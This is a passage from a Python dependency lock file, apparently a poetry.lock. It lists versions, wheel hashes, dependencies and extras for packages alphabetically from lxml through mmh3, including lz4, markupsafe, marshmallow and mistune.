"lxml-4.9.3-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:3331bece23c9ee066e0fb3f96c61322b9e0f54d775fccefff4c38ca488de283a"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-macosx_11_0_x86_64.whl", hash = "sha256:ed667f49b11360951e201453fc3967344d0d0263aa415e1619e85ae7fd17b4e0"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:8b77946fd508cbf0fccd8e400a7f71d4ac0e1595812e66025bac475a8e811694"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:e4da8ca0c0c0aea88fd46be8e44bd49716772358d648cce45fe387f7b92374a7"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:fe4bda6bd4340caa6e5cf95e73f8fea5c4bfc55763dd42f1b50a94c1b4a2fbd4"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:f3df3db1d336b9356dd3112eae5f5c2b8b377f3bc826848567f10bfddfee77e9"}, {file = "lxml-4.9.3.tar.gz", hash = "sha256:48628bd53a426c9eb9bc066a923acaa0878d1e86129fd5359aee99285f4eed9c"}, ] [package.extras] cssselect = ["cssselect (>=0.7)"] html5 = ["html5lib"] htmlsoup = ["BeautifulSoup4"] source = ["Cython (>=0.29.35)"] [[package]] name = "lz4" version = "4.3.2" description = "LZ4 Bindings for Python" optional = true python-versions = ">=3.7" files = [ {file = "lz4-4.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1c4c100d99eed7c08d4e8852dd11e7d1ec47a3340f49e3a96f8dfbba17ffb300"}, {file = "lz4-4.3.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:edd8987d8415b5dad25e797043936d91535017237f72fa456601be1479386c92"}, {file = "lz4-4.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f7c50542b4ddceb74ab4f8b3435327a0861f06257ca501d59067a6a482535a77"}, {file = "lz4-4.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0f5614d8229b33d4a97cb527db2a1ac81308c6e796e7bdb5d1309127289f69d5"}, {file = "lz4-4.3.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8f00a9ba98f6364cadda366ae6469b7b3568c0cced27e16a47ddf6b774169270"}, {file = "lz4-4.3.2-cp310-cp310-win32.whl", hash = "sha256:b10b77dc2e6b1daa2f11e241141ab8285c42b4ed13a8642495620416279cc5b2"}, {file = "lz4-4.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:86480f14a188c37cb1416cdabacfb4e42f7a5eab20a737dac9c4b1c227f3b822"}, {file = "lz4-4.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7c2df117def1589fba1327dceee51c5c2176a2b5a7040b45e84185ce0c08b6a3"}, {file = "lz4-4.3.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1f25eb322eeb24068bb7647cae2b0732b71e5c639e4e4026db57618dcd8279f0"}, {file = "lz4-4.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8df16c9a2377bdc01e01e6de5a6e4bbc66ddf007a6b045688e285d7d9d61d1c9"}, {file = "lz4-4.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f571eab7fec554d3b1db0d666bdc2ad85c81f4b8cb08906c4c59a8cad75e6e22"}, {file = "lz4-4.3.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7211dc8f636ca625abc3d4fb9ab74e5444b92df4f8d58ec83c8868a2b0ff643d"}, {file = "lz4-4.3.2-cp311-cp311-win32.whl", hash = "sha256:867664d9ca9bdfce840ac96d46cd8838c9ae891e859eb98ce82fcdf0e103a947"}, {file = "lz4-4.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:a6a46889325fd60b8a6b62ffc61588ec500a1883db32cddee9903edfba0b7584"}, {file = "lz4-4.3.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:3a85b430138882f82f354135b98c320dafb96fc8fe4656573d95ab05de9eb092"}, {file = "lz4-4.3.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:65d5c93f8badacfa0456b660285e394e65023ef8071142e0dcbd4762166e1be0"}, {file = "lz4-4.3.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6b50f096a6a25f3b2edca05aa626ce39979d63c3b160687c8c6d50ac3943d0ba"}, {file = "lz4-4.3.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:200d05777d61ba1ff8d29cb51c534a162ea0b4fe6d3c28be3571a0a48ff36080"}, {file = "lz4-4.3.2-cp37-cp37m-win32.whl", hash = "sha256:edc2fb3463d5d9338ccf13eb512aab61937be50aa70734bcf873f2f493801d3b"}, {file = "lz4-4.3.2-cp37-cp37m-win_amd64.whl", hash = "sha256:83acfacab3a1a7ab9694333bcb7950fbeb0be21660d236fd09c8337a50817897"}, {file = "lz4-4.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:7a9eec24ec7d8c99aab54de91b4a5a149559ed5b3097cf30249b665689b3d402"}, {file = "lz4-4.3.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:31d72731c4ac6ebdce57cd9a5cabe0aecba229c4f31ba3e2c64ae52eee3fdb1c"}, {file = "lz4-4.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:83903fe6db92db0be101acedc677aa41a490b561567fe1b3fe68695b2110326c"}, {file = "lz4-4.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:926b26db87ec8822cf1870efc3d04d06062730ec3279bbbd33ba47a6c0a5c673"}, {file = "lz4-4.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e05afefc4529e97c08e65ef92432e5f5225c0bb21ad89dee1e06a882f91d7f5e"}, {file = "lz4-4.3.2-cp38-cp38-win32.whl", hash = "sha256:ad38dc6a7eea6f6b8b642aaa0683253288b0460b70cab3216838747163fb774d"}, {file = "lz4-4.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:7e2dc1bd88b60fa09b9b37f08553f45dc2b770c52a5996ea52b2b40f25445676"}, {file = "lz4-4.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:edda4fb109439b7f3f58ed6bede59694bc631c4b69c041112b1b7dc727fffb23"}, {file = "lz4-4.3.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:0ca83a623c449295bafad745dcd399cea4c55b16b13ed8cfea30963b004016c9"}, {file = "lz4-4.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d5ea0e788dc7e2311989b78cae7accf75a580827b4d96bbaf06c7e5a03989bd5"}, {file = "lz4-4.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a98b61e504fb69f99117b188e60b71e3c94469295571492a6468c1acd63c37ba"}, {file = "lz4-4.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4931ab28a0d1c133104613e74eec1b8bb1f52403faabe4f47f93008785c0b929"}, {file = "lz4-4.3.2-cp39-cp39-win32.whl", hash = "sha256:ec6755cacf83f0c5588d28abb40a1ac1643f2ff2115481089264c7630236618a"}, {file = "lz4-4.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:4caedeb19e3ede6c7a178968b800f910db6503cb4cb1e9cc9221157572139b49"}, {file = "lz4-4.3.2.tar.gz", hash = "sha256:e1431d84a9cfb23e6773e72078ce8e65cad6745816d4cbf9ae67da5ea419acda"}, ] [package.extras] docs = ["sphinx (>=1.6.0)", "sphinx-bootstrap-theme"] flake8 = ["flake8"] tests = ["psutil", "pytest (!=3.3.0)", "pytest-cov"] [[package]] name = "manifest-ml" version = "0.0.1" description = "Manifest for Prompt Programming Foundation Models." optional = true python-versions = ">=3.8.0" files = [ {file = "manifest-ml-0.0.1.tar.gz", hash = "sha256:f828faf7de41fad5318254beec08acdf5142196e0e22203a4047412c2d3127a0"}, {file = "manifest_ml-0.0.1-py2.py3-none-any.whl", hash = "sha256:fc4e62e706fd767fd8851d91051fdb71bc79b2df9c66f5879736c46d8163a316"}, ] [package.dependencies] dill = ">=0.3.5" redis = ">=4.3.1" requests = ">=2.27.1" sqlitedict = ">=2.0.0" tqdm = ">=4.64.0" [package.extras] all = ["Flask (>=2.1.2)", "accelerate (>=0.10.0)", "autopep8 (>=1.6.0)", "black (>=22.3.0)", "docformatter (>=1.4)", "flake8 (>=4.0.0)", "flake8-docstrings (>=1.6.0)", "isort (>=5.9.3)", "mypy (>=0.950)", "nbsphinx (>=0.8.0)", "pep8-naming (>=0.12.1)", "pre-commit (>=2.14.0)", "pytest (>=7.0.0)", "pytest-cov (>=3.0.0)", "python-dotenv (>=0.20.0)", "recommonmark (>=0.7.1)", "sphinx-autobuild", "sphinx-rtd-theme (>=0.5.1)", "torch (>=1.8.0)", "transformers (>=4.20.0)", "twine", "types-PyYAML (>=6.0.7)", "types-protobuf (>=3.19.21)", "types-python-dateutil (>=2.8.16)", "types-redis (>=4.2.6)", "types-requests (>=2.27.29)", "types-setuptools (>=57.4.17)"] api = ["Flask (>=2.1.2)", "accelerate (>=0.10.0)", "torch (>=1.8.0)", "transformers (>=4.20.0)"] dev = ["autopep8 (>=1.6.0)", "black (>=22.3.0)", "docformatter (>=1.4)", "flake8 (>=4.0.0)", "flake8-docstrings (>=1.6.0)", "isort (>=5.9.3)", "mypy (>=0.950)", "nbsphinx (>=0.8.0)", "pep8-naming (>=0.12.1)", "pre-commit (>=2.14.0)", "pytest (>=7.0.0)", "pytest-cov (>=3.0.0)", "python-dotenv (>=0.20.0)", "recommonmark (>=0.7.1)", "sphinx-autobuild", "sphinx-rtd-theme (>=0.5.1)", "twine", "types-PyYAML (>=6.0.7)", "types-protobuf (>=3.19.21)", "types-python-dateutil (>=2.8.16)", "types-redis (>=4.2.6)", "types-requests (>=2.27.29)", "types-setuptools (>=57.4.17)"] [[package]] name = "markdown" version = "3.5" description = "Python implementation of John Gruber's Markdown." optional = true python-versions = ">=3.8" files = [ {file = "Markdown-3.5-py3-none-any.whl", hash = "sha256:4afb124395ce5fc34e6d9886dab977fd9ae987fc6e85689f08278cf0c69d4bf3"}, {file = "Markdown-3.5.tar.gz", hash = "sha256:a807eb2e4778d9156c8f07876c6e4d50b5494c5665c4834f67b06459dfd877b3"}, ] [package.extras] docs = ["mdx-gh-links (>=0.2)", "mkdocs (>=1.5)", "mkdocs-gen-files", "mkdocs-literate-nav", "mkdocs-nature (>=0.6)", "mkdocs-section-index", "mkdocstrings[python]"] testing = ["coverage", "pyyaml"] [[package]] name = "markdown-it-py" version = "3.0.0" description = "Python port of markdown-it. Markdown parsing, done right!" optional = true python-versions = ">=3.8" files = [ {file = "markdown-it-py-3.0.0.tar.gz", hash = "sha256:e3f60a94fa066dc52ec76661e37c851cb232d92f9886b15cb560aaada2df8feb"}, {file = "markdown_it_py-3.0.0-py3-none-any.whl", hash = "sha256:355216845c60bd96232cd8d8c40e8f9765cc86f46880e43a8fd22dc1a1a8cab1"}, ] [package.dependencies] mdurl = ">=0.1,<1.0" [package.extras] benchmarking = ["psutil", "pytest", "pytest-benchmark"] code-style = ["pre-commit (>=3.0,<4.0)"] compare = ["commonmark (>=0.9,<1.0)", "markdown (>=3.4,<4.0)", "mistletoe (>=1.0,<2.0)", "mistune (>=2.0,<3.0)", "panflute (>=2.3,<3.0)"] linkify = ["linkify-it-py (>=1,<3)"] plugins = ["mdit-py-plugins"] profiling = ["gprof2dot"] rtd = ["jupyter_sphinx", "mdit-py-plugins", "myst-parser", "pyyaml", "sphinx", "sphinx-copybutton", "sphinx-design", "sphinx_book_theme"] testing = ["coverage", "pytest", "pytest-cov", "pytest-regressions"] [[package]] name = "markdownify" version = "0.11.6" description = "Convert HTML to markdown." optional = true python-versions = "*" files = [ {file = "markdownify-0.11.6-py3-none-any.whl", hash = "sha256:ba35fe289d5e9073bcd7d2cad629278fe25f1a93741fcdc0bfb4f009076d8324"}, {file = "markdownify-0.11.6.tar.gz", hash = "sha256:009b240e0c9f4c8eaf1d085625dcd4011e12f0f8cec55dedf9ea6f7655e49bfe"}, ] [package.dependencies] beautifulsoup4 = ">=4.9,<5" six = ">=1.15,<2" [[package]] name = "markupsafe" version = "2.1.3" description = "Safely add untrusted strings to HTML/XML markup." optional = false python-versions = ">=3.7" files = [ {file = "MarkupSafe-2.1.3-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:cd0f502fe016460680cd20aaa5a76d241d6f35a1c3350c474bac1273803893fa"}, {file = "MarkupSafe-2.1.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e09031c87a1e51556fdcb46e5bd4f59dfb743061cf93c4d6831bf894f125eb57"}, {file = "MarkupSafe-2.1.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:68e78619a61ecf91e76aa3e6e8e33fc4894a2bebe93410754bd28fce0a8a4f9f"}, {file = "MarkupSafe-2.1.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:65c1a9bcdadc6c28eecee2c119465aebff8f7a584dd719facdd9e825ec61ab52"}, {file = "MarkupSafe-2.1.3-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:525808b8019e36eb524b8c68acdd63a37e75714eac50e988180b169d64480a00"}, {file = "MarkupSafe-2.1.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:962f82a3086483f5e5f64dbad880d31038b698494799b097bc59c2edf392fce6"}, {file = "MarkupSafe-2.1.3-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:aa7bd130efab1c280bed0f45501b7c8795f9fdbeb02e965371bbef3523627779"}, {file = "MarkupSafe-2.1.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c9c804664ebe8f83a211cace637506669e7890fec1b4195b505c214e50dd4eb7"}, {file = "MarkupSafe-2.1.3-cp310-cp310-win32.whl", hash = "sha256:10bbfe99883db80bdbaff2dcf681dfc6533a614f700da1287707e8a5d78a8431"}, {file = "MarkupSafe-2.1.3-cp310-cp310-win_amd64.whl", hash = "sha256:1577735524cdad32f9f694208aa75e422adba74f1baee7551620e43a3141f559"}, {file = "MarkupSafe-2.1.3-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:ad9e82fb8f09ade1c3e1b996a6337afac2b8b9e365f926f5a61aacc71adc5b3c"}, {file = "MarkupSafe-2.1.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:3c0fae6c3be832a0a0473ac912810b2877c8cb9d76ca48de1ed31e1c68386575"}, {file = "MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b076b6226fb84157e3f7c971a47ff3a679d837cf338547532ab866c57930dbee"}, {file = "MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bfce63a9e7834b12b87c64d6b155fdd9b3b96191b6bd334bf37db7ff1fe457f2"}, {file = "MarkupSafe-2.1.3-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:338ae27d6b8745585f87218a3f23f1512dbf52c26c28e322dbe54bcede54ccb9"}, {file = "MarkupSafe-2.1.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e4dd52d80b8c83fdce44e12478ad2e85c64ea965e75d66dbeafb0a3e77308fcc"}, {file = "MarkupSafe-2.1.3-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:df0be2b576a7abbf737b1575f048c23fb1d769f267ec4358296f31c2479db8f9"}, {file = "MarkupSafe-2.1.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:5bbe06f8eeafd38e5d0a4894ffec89378b6c6a625ff57e3028921f8ff59318ac"}, {file = "MarkupSafe-2.1.3-cp311-cp311-win32.whl", hash = "sha256:dd15ff04ffd7e05ffcb7fe79f1b98041b8ea30ae9234aed2a9168b5797c3effb"}, {file = "MarkupSafe-2.1.3-cp311-cp311-win_amd64.whl", hash = "sha256:134da1eca9ec0ae528110ccc9e48041e0828d79f24121a1a146161103c76e686"}, {file = "MarkupSafe-2.1.3-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:f698de3fd0c4e6972b92290a45bd9b1536bffe8c6759c62471efaa8acb4c37bc"}, {file = "MarkupSafe-2.1.3-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:aa57bd9cf8ae831a362185ee444e15a93ecb2e344c8e52e4d721ea3ab6ef1823"}, {file = "MarkupSafe-2.1.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ffcc3f7c66b5f5b7931a5aa68fc9cecc51e685ef90282f4a82f0f5e9b704ad11"}, {file = "MarkupSafe-2.1.3-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:47d4f1c5f80fc62fdd7777d0d40a2e9dda0a05883ab11374334f6c4de38adffd"}, {file = "MarkupSafe-2.1.3-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1f67c7038d560d92149c060157d623c542173016c4babc0c1913cca0564b9939"}, {file = "MarkupSafe-2.1.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:9aad3c1755095ce347e26488214ef77e0485a3c34a50c5a5e2471dff60b9dd9c"}, {file = "MarkupSafe-2.1.3-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:14ff806850827afd6b07a5f32bd917fb7f45b046ba40c57abdb636674a8b559c"}, {file = "MarkupSafe-2.1.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8f9293864fe09b8149f0cc42ce56e3f0e54de883a9de90cd427f191c346eb2e1"}, {file = "MarkupSafe-2.1.3-cp312-cp312-win32.whl", hash = "sha256:715d3562f79d540f251b99ebd6d8baa547118974341db04f5ad06d5ea3eb8007"}, {file = "MarkupSafe-2.1.3-cp312-cp312-win_amd64.whl", hash = "sha256:1b8dd8c3fd14349433c79fa8abeb573a55fc0fdd769133baac1f5e07abf54aeb"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:8e254ae696c88d98da6555f5ace2279cf7cd5b3f52be2b5cf97feafe883b58d2"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cb0932dc158471523c9637e807d9bfb93e06a95cbf010f1a38b98623b929ef2b"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9402b03f1a1b4dc4c19845e5c749e3ab82d5078d16a2a4c2cd2df62d57bb0707"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ca379055a47383d02a5400cb0d110cef0a776fc644cda797db0c5696cfd7e18e"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:b7ff0f54cb4ff66dd38bebd335a38e2c22c41a8ee45aa608efc890ac3e3931bc"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:c011a4149cfbcf9f03994ec2edffcb8b1dc2d2aede7ca243746df97a5d41ce48"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:56d9f2ecac662ca1611d183feb03a3fa4406469dafe241673d521dd5ae92a155"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-win32.whl", hash = "sha256:8758846a7e80910096950b67071243da3e5a20ed2546e6392603c096778d48e0"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-win_amd64.whl", hash = "sha256:787003c0ddb00500e49a10f2844fac87aa6ce977b90b0feaaf9de23c22508b24"}, {file = "MarkupSafe-2.1.3-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:2ef12179d3a291be237280175b542c07a36e7f60718296278d8593d21ca937d4"}, {file = "MarkupSafe-2.1.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2c1b19b3aaacc6e57b7e25710ff571c24d6c3613a45e905b1fde04d691b98ee0"}, {file = "MarkupSafe-2.1.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8afafd99945ead6e075b973fefa56379c5b5c53fd8937dad92c662da5d8fd5ee"}, {file = "MarkupSafe-2.1.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8c41976a29d078bb235fea9b2ecd3da465df42a562910f9022f1a03107bd02be"}, {file = "MarkupSafe-2.1.3-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d080e0a5eb2529460b30190fcfcc4199bd7f827663f858a226a81bc27beaa97e"}, {file = "MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:69c0f17e9f5a7afdf2cc9fb2d1ce6aabdb3bafb7f38017c0b77862bcec2bbad8"}, {file = "MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:504b320cd4b7eff6f968eddf81127112db685e81f7e36e75f9f84f0df46041c3"}, {file = "MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:42de32b22b6b804f42c5d98be4f7e5e977ecdd9ee9b660fda1a3edf03b11792d"}, {file = "MarkupSafe-2.1.3-cp38-cp38-win32.whl", hash = "sha256:ceb01949af7121f9fc39f7d27f91be8546f3fb112c608bc4029aef0bab86a2a5"}, {file = "MarkupSafe-2.1.3-cp38-cp38-win_amd64.whl", hash = "sha256:1b40069d487e7edb2676d3fbdb2b0829ffa2cd63a2ec26c4938b2d34391b4ecc"}, {file = "MarkupSafe-2.1.3-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8023faf4e01efadfa183e863fefde0046de576c6f14659e8782065bcece22198"}, {file = "MarkupSafe-2.1.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6b2b56950d93e41f33b4223ead100ea0fe11f8e6ee5f641eb753ce4b77a7042b"}, {file = "MarkupSafe-2.1.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9dcdfd0eaf283af041973bff14a2e143b8bd64e069f4c383416ecd79a81aab58"}, {file = "MarkupSafe-2.1.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:05fb21170423db021895e1ea1e1f3ab3adb85d1c2333cbc2310f2a26bc77272e"}, {file = "MarkupSafe-2.1.3-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:282c2cb35b5b673bbcadb33a585408104df04f14b2d9b01d4c345a3b92861c2c"}, {file = "MarkupSafe-2.1.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ab4a0df41e7c16a1392727727e7998a467472d0ad65f3ad5e6e765015df08636"}, {file = "MarkupSafe-2.1.3-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:7ef3cb2ebbf91e330e3bb937efada0edd9003683db6b57bb108c4001f37a02ea"}, {file = "MarkupSafe-2.1.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:0a4e4a1aff6c7ac4cd55792abf96c915634c2b97e3cc1c7129578aa68ebd754e"}, {file = "MarkupSafe-2.1.3-cp39-cp39-win32.whl", hash = "sha256:fec21693218efe39aa7f8599346e90c705afa52c5b31ae019b2e57e8f6542bb2"}, {file = "MarkupSafe-2.1.3-cp39-cp39-win_amd64.whl", hash = "sha256:3fd4abcb888d15a94f32b75d8fd18ee162ca0c064f35b11134be77050296d6ba"}, {file = "MarkupSafe-2.1.3.tar.gz", hash = "sha256:af598ed32d6ae86f1b747b82783958b1a4ab8f617b06fe68795c7f026abbdcad"}, ] [[package]] name = "marqo" version = "1.3.1" description = "Tensor search for humans" optional = true python-versions = ">=3" files = [ {file = "marqo-1.3.1-py3-none-any.whl", hash = "sha256:32b1eb95dcd53027277b5f9704bb4a1db29f0c113b487df56dfdc63ef5805f47"}, {file = "marqo-1.3.1.tar.gz", hash = "sha256:d2bab35df93ee7790d10dac459620dcd1133332d0a693046d0aebf17994cf8ac"}, ] [package.dependencies] packaging = "*" pydantic = "<2.0.0" requests = "*" typing-extensions = ">=4.5.0" urllib3 = "*" [[package]] name = "marshmallow" version = "3.20.1" description = "A lightweight library for converting complex datatypes to and from native Python datatypes." optional = false python-versions = ">=3.8" files = [ {file = "marshmallow-3.20.1-py3-none-any.whl", hash = "sha256:684939db93e80ad3561392f47be0230743131560a41c5110684c16e21ade0a5c"}, {file = "marshmallow-3.20.1.tar.gz", hash = "sha256:5d2371bbe42000f2b3fb5eaa065224df7d8f8597bc19a1bbfa5bfe7fba8da889"}, ] [package.dependencies] packaging = ">=17.0" [package.extras] dev = ["flake8 (==6.0.0)", "flake8-bugbear (==23.7.10)", "mypy (==1.4.1)", "pre-commit (>=2.4,<4.0)", "pytest", "pytz", "simplejson", "tox"] docs = ["alabaster (==0.7.13)", "autodocsumm (==0.2.11)", "sphinx (==7.0.1)", "sphinx-issues (==3.0.1)", "sphinx-version-warning (==1.1.2)"] lint = ["flake8 (==6.0.0)", "flake8-bugbear (==23.7.10)", "mypy (==1.4.1)", "pre-commit (>=2.4,<4.0)"] tests = ["pytest", "pytz", "simplejson"] [[package]] name = "matplotlib-inline" version = "0.1.6" description = "Inline Matplotlib backend for Jupyter" optional = false python-versions = ">=3.5" files = [ {file = "matplotlib-inline-0.1.6.tar.gz", hash = "sha256:f887e5f10ba98e8d2b150ddcf4702c1e5f8b3a20005eb0f74bfdbd360ee6f304"}, {file = "matplotlib_inline-0.1.6-py3-none-any.whl", hash = "sha256:f1f41aab5328aa5aaea9b16d083b128102f8712542f819fe7e6a420ff581b311"}, ] [package.dependencies] traitlets = "*" [[package]] name = "mdurl" version = "0.1.2" description = "Markdown URL utilities" optional = true python-versions = ">=3.7" files = [ {file = "mdurl-0.1.2-py3-none-any.whl", hash = "sha256:84008a41e51615a49fc9966191ff91509e3c40b939176e643fd50a5c2196b8f8"}, {file = "mdurl-0.1.2.tar.gz", hash = "sha256:bb413d29f5eea38f31dd4754dd7377d4465116fb207585f97bf925588687c1ba"}, ] [[package]] name = "mistune" version = "3.0.2" description = "A sane and fast Markdown parser with useful plugins and renderers" optional = false python-versions = ">=3.7" files = [ {file = "mistune-3.0.2-py3-none-any.whl", hash = "sha256:71481854c30fdbc938963d3605b72501f5c10a9320ecd412c121c163a1c7d205"}, {file = "mistune-3.0.2.tar.gz", hash = "sha256:fc7f93ded930c92394ef2cb6f04a8aabab4117a91449e72dcc8dfa646a508be8"}, ] [[package]] name = "mmh3" version = "3.1.0" description = "Python wrapper for MurmurHash (MurmurHash3), a set of fast and robust hash functions." optional = true python-versions = "*" files = [ {file = "mmh3-3.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:16ee043b1bac040b4324b8baee39df9fdca480a560a6d74f2eef66a5009a234e"}, {file = "mmh3-3.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:04ac865319e5b36148a4b6cdf27f8bda091c47c4ab7b355d7f353dfc2b8a3cce"}, {file = "mmh3-3.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9e751f5433417a21c2060b0efa1afc67cfbe29977c867336148c8edb086fae70"}, {file = "mmh3-3.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bdb863b89c1b34e3681d4a3b15d424734940eb8036f3457cb35ef34fb87a503c"}, {file = "mmh3-3.1.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1230930fbf2faec4ddf5b76d0768ae73c102de173c301962bdd468177275adf9"}, {file = "mmh3-3.1.0-cp310-cp310-win32.whl", hash = "sha256:b8ed7a2361718795a1b519a08d05f44947a20b27e202b53946561a00dde669c1"}, {file = "mmh3-3.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:29e878e7467a000f34ab68c218ad7ad81312c0a94bc10df3c50a48bcad39dd83"}, {file = "mmh3-3.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:c271472325b70d64a4fbb1f2e964ca5b093ac10258e1390f8408890b065868fe"}, {file = "mmh3-3.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:0109320f7e0e262123ff4f1acd06acfbc8b3bf19cc13d98c0bc369264430aaeb"}, {file = 